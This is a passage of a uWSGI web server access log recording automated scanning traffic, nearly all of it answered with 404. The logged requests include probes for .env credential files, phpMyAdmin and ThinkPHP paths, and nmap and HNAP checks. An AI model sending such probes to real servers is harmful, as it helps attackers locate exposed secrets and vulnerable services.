msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 784/911] 82.76.165.109 () {36 vars in 523 bytes} 
[Wed Feb 9 12:49:24 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 785/912] 82.76.165.109 () {40 vars in 630 bytes} [Wed Feb 9 12:49:25 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 786/913] 184.105.139.67 () {28 vars in 308 bytes} [Wed Feb 9 12:56:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 787/914] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 9 13:17:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 788/915] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 9 14:33:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 789/916] 193.118.53.210 () {34 vars in 488 bytes} [Wed Feb 9 15:39:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 790/917] 183.136.225.56 () {34 vars in 534 bytes} [Wed Feb 9 17:17:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 791/918] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 792/919] 94.73.19.43 () {32 vars in 461 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 793/920] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 794/921] 94.73.19.43 () {32 vars in 468 
bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 795/922] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 796/923] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 797/924] 94.73.19.43 () {32 vars in 461 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 69/925] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 798/926] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 799/927] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 9 18:22:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 800/928] 157.245.116.178 () {32 vars in 441 bytes} [Wed Feb 9 19:38:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 801/929] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 9 19:57:14 2022] GET / => generated 179 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 802/930] 138.122.164.192 () {32 vars in 472 bytes} [Wed Feb 9 20:54:00 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 803/931] 165.154.21.120 () {30 vars in 329 
bytes} [Wed Feb 9 22:58:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 804/932] 47.101.189.46 () {34 vars in 459 bytes} [Wed Feb 9 23:56:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 805/933] 101.133.140.205 () {22 vars in 236 bytes} [Thu Feb 10 00:19:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 70/934] 101.133.140.205 () {22 vars in 298 bytes} [Thu Feb 10 00:19:10 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 806/935] 101.133.140.205 () {22 vars in 240 bytes} [Thu Feb 10 00:19:20 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 807/936] 101.133.140.205 () {22 vars in 240 bytes} [Thu Feb 10 00:19:24 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 808/937] 101.133.140.205 () {40 vars in 485 bytes} [Thu Feb 10 00:19:29 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 809/938] 212.192.241.207 () {36 vars in 525 bytes} [Thu Feb 10 00:22:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 810/939] 212.192.241.207 () {40 vars in 632 bytes} [Thu Feb 10 00:22:13 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 811/940] 83.97.20.34 () {30 vars in 328 bytes} [Thu Feb 10 00:55:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19148|app: 0|req: 812/941] 209.17.96.90 () {30 vars in 409 bytes} [Thu Feb 10 01:29:23 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 813/942] 139.198.168.128 () {38 vars in 721 bytes} [Thu Feb 10 01:44:20 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 814/943] 139.198.168.128 () {38 vars in 700 bytes} [Thu Feb 10 01:44:20 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 815/944] 139.198.168.128 () {38 vars in 736 bytes} [Thu Feb 10 01:44:20 2022] GET /phpmyadmin4.8.5/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 816/945] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 10 02:14:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 817/946] 185.180.143.7 () {34 vars in 487 bytes} [Thu Feb 10 02:24:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 818/947] 101.133.132.65 () {34 vars in 427 bytes} [Thu Feb 10 02:37:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 819/948] 223.27.238.86 () {36 vars in 432 bytes} [Thu Feb 10 03:43:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 820/949] 223.27.238.86 () {32 vars in 390 bytes} [Thu Feb 10 03:43:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 71/950] 45.33.96.205 () {34 vars in 498 bytes} [Thu Feb 10 03:44:13 2022] 
GET /admin/ => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 821/951] 39.103.159.236 () {34 vars in 502 bytes} [Thu Feb 10 04:29:23 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 822/952] 39.103.159.236 () {32 vars in 514 bytes} [Thu Feb 10 04:29:38 2022] GET /nmaplowercheck1644467362 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 823/953] 39.103.159.236 () {32 vars in 486 bytes} [Thu Feb 10 04:29:38 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 824/954] 39.103.159.236 () {32 vars in 476 bytes} [Thu Feb 10 04:29:45 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 825/955] 39.103.159.236 () {28 vars in 308 bytes} [Thu Feb 10 04:29:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 826/956] 128.14.134.134 () {34 vars in 488 bytes} [Thu Feb 10 04:52:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 827/957] 192.241.212.10 () {34 vars in 422 bytes} [Thu Feb 10 05:32:55 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 828/958] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 10 05:51:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 829/959] 91.211.178.123 () {32 vars in 471 bytes} [Thu Feb 10 06:05:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 830/960] 192.241.208.45 () {34 vars in 424 bytes} [Thu Feb 10 06:09:25 2022] GET /actuator/health => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 831/961] 128.14.134.170 () {34 vars in 488 bytes} [Thu Feb 10 06:12:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 832/962] 101.133.140.114 () {36 vars in 551 bytes} [Thu Feb 10 06:17:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 833/963] 47.103.33.128 () {36 vars in 549 bytes} [Thu Feb 10 06:20:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 834/964] 192.241.212.223 () {34 vars in 407 bytes} [Thu Feb 10 06:44:28 2022] GET /hudson => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 835/965] 47.103.98.159 () {32 vars in 502 bytes} [Thu Feb 10 07:01:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 836/966] 106.14.83.56 () {32 vars in 500 bytes} [Thu Feb 10 07:33:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 837/967] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 10 07:57:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 838/968] 128.14.141.34 () {34 vars in 487 bytes} [Thu Feb 10 08:36:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 839/969] 167.249.102.51 () {32 vars in 464 bytes} [Thu Feb 10 09:08:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 840/970] 221.226.14.142 () {32 vars in 358 bytes} [Thu Feb 10 10:38:51 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 162.142.125.212 client_port: 24758] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 841/971] 162.142.125.212 () {24 vars in 267 bytes} [Thu Feb 10 10:49:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 842/972] 162.142.125.212 () {30 vars in 401 bytes} [Thu Feb 10 10:49:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 843/973] 162.142.125.212 () {22 vars in 236 bytes} [Thu Feb 10 10:49:07 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 167.248.133.119 client_port: 34027] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 844/974] 167.248.133.119 () {24 vars in 267 bytes} [Thu Feb 10 11:02:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 845/975] 167.248.133.119 () {30 vars in 402 bytes} [Thu Feb 10 11:02:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 846/976] 167.248.133.119 () {22 vars in 236 bytes} [Thu Feb 10 11:02:02 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 847/977] 165.227.125.62 () {22 vars in 236 bytes} [Thu Feb 10 12:28:10 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 848/978] 165.227.125.62 () {36 
vars in 554 bytes} [Thu Feb 10 12:28:12 2022] GET /system_api.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 849/979] 165.227.125.62 () {36 vars in 550 bytes} [Thu Feb 10 12:28:16 2022] GET /c/version.js => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 850/980] 165.227.125.62 () {32 vars in 508 bytes} [Thu Feb 10 12:28:17 2022] GET /c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 8/981] 165.227.125.62 () {36 vars in 578 bytes} [Thu Feb 10 12:28:19 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 29/982] 165.227.125.62 () {32 vars in 536 bytes} [Thu Feb 10 12:28:20 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 9/983] 165.227.125.62 () {36 vars in 580 bytes} [Thu Feb 10 12:28:21 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 72/984] 165.227.125.62 () {32 vars in 538 bytes} [Thu Feb 10 12:28:21 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 8/985] 165.227.125.62 () {36 vars in 463 bytes} [Thu Feb 10 12:28:22 2022] GET /stream/live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 30/986] 165.227.125.62 () {32 vars in 421 bytes} [Thu Feb 10 12:28:22 2022] GET /stream/live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 9/987] 165.227.125.62 () {36 vars in 
550 bytes} [Thu Feb 10 12:28:24 2022] GET /flu/403.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 73/988] 165.227.125.62 () {32 vars in 508 bytes} [Thu Feb 10 12:28:24 2022] GET /flu/403.html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 31/989] 165.227.125.62 () {36 vars in 526 bytes} [Thu Feb 10 12:28:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 9/990] 45.83.66.49 () {42 vars in 574 bytes} [Thu Feb 10 12:29:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 32/991] 45.83.64.235 () {42 vars in 597 bytes} [Thu Feb 10 12:29:49 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 851/992] 34.140.248.32 () {42 vars in 563 bytes} [Thu Feb 10 12:33:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 852/993] 172.93.189.34 () {36 vars in 589 bytes} [Thu Feb 10 13:35:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 33/994] 172.93.189.34 () {40 vars in 696 bytes} [Thu Feb 10 13:35:45 2022] POST / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 853/995] 101.132.119.255 () {34 vars in 433 bytes} [Thu Feb 10 13:36:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 854/996] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 10 13:39:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 855/997] 192.241.205.238 () {34 vars in 395 bytes} [Thu Feb 10 15:21:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 856/998] 2.57.121.247 () {34 vars in 401 bytes} [Thu Feb 10 16:04:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 857/999] 162.221.192.26 () {34 vars in 488 bytes} [Thu Feb 10 16:04:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 858/1000] 20.111.31.87 () {36 vars in 522 bytes} [Thu Feb 10 16:44:03 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 859/1001] 20.111.31.87 () {40 vars in 629 bytes} [Thu Feb 10 16:44:04 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 860/1002] 121.89.194.108 () {22 vars in 235 bytes} [Thu Feb 10 18:02:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 861/1003] 121.89.194.108 () {22 vars in 297 bytes} [Thu Feb 10 18:02:07 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 862/1004] 121.89.194.108 () {22 vars in 239 bytes} [Thu Feb 10 18:02:12 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 863/1005] 121.89.194.108 () {22 vars in 239 bytes} [Thu Feb 10 18:02:13 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 864/1006] 121.89.194.108 () {40 vars in 485 bytes} [Thu Feb 10 18:02:15 2022] OPTIONS sip:nm => generated 
179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 865/1007] 209.17.97.122 () {30 vars in 410 bytes} [Thu Feb 10 18:10:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 866/1008] 65.141.6.170 () {36 vars in 522 bytes} [Thu Feb 10 18:13:51 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 867/1009] 65.141.6.170 () {40 vars in 629 bytes} [Thu Feb 10 18:13:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 868/1010] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 10 18:23:46 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 869/1011] 185.173.35.25 () {30 vars in 451 bytes} [Thu Feb 10 18:33:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 870/1012] 83.97.20.34 () {26 vars in 286 bytes} [Thu Feb 10 19:20:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 871/1013] 47.95.213.129 () {34 vars in 500 bytes} [Thu Feb 10 20:05:08 2022] GET /TP/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 872/1014] 47.95.213.129 () {34 vars in 486 bytes} [Thu Feb 10 20:05:08 2022] GET /TP/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 873/1015] 47.95.213.129 () {34 vars in 522 bytes} [Thu Feb 10 20:05:08 2022] GET /thinkphp/html/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 
3/1016] 47.95.213.129 () {34 vars in 504 bytes} [Thu Feb 10 20:05:08 2022] GET /html/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 10/1017] 47.95.213.129 () {34 vars in 494 bytes} [Thu Feb 10 20:05:08 2022] GET /public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 10/1018] 47.95.213.129 () {34 vars in 510 bytes} [Thu Feb 10 20:05:08 2022] GET /TP/html/public/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 11/1019] 47.95.213.129 () {34 vars in 482 bytes} [Thu Feb 10 20:05:09 2022] GET /elrekt.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 874/1020] 47.95.213.129 () {34 vars in 480 bytes} [Thu Feb 10 20:05:09 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 875/1021] 47.95.213.129 () {34 vars in 465 bytes} [Thu Feb 10 20:05:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 876/1022] 121.141.54.237 () {32 vars in 487 bytes} [Thu Feb 10 20:12:06 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 877/1023] 183.106.230.13 () {38 vars in 530 bytes} [Thu Feb 10 20:38:19 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 878/1024] 175.206.193.241 () {38 vars in 531 bytes} [Thu Feb 10 20:51:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 879/1025] 103.171.36.29 () {32 vars in 463 bytes} [Thu Feb 10 21:52:35 2022] GET / 
=> generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 880/1026] 109.237.103.9 () {36 vars in 523 bytes} [Thu Feb 10 22:26:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 881/1027] 64.225.76.117 () {36 vars in 481 bytes} [Thu Feb 10 22:51:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 882/1028] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 10 23:23:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 883/1029] 167.94.138.45 () {28 vars in 310 bytes} [Thu Feb 10 23:43:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 884/1030] 167.94.138.45 () {34 vars in 442 bytes} [Thu Feb 10 23:43:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 885/1031] 109.237.103.123 () {36 vars in 525 bytes} [Thu Feb 10 23:43:31 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 886/1032] 128.1.248.42 () {34 vars in 486 bytes} [Fri Feb 11 00:17:33 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 887/1033] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 11 01:14:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 888/1034] 183.136.225.56 () {34 vars in 456 bytes} [Fri Feb 11 01:41:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 889/1035] 222.186.46.200 () {30 vars in 504 
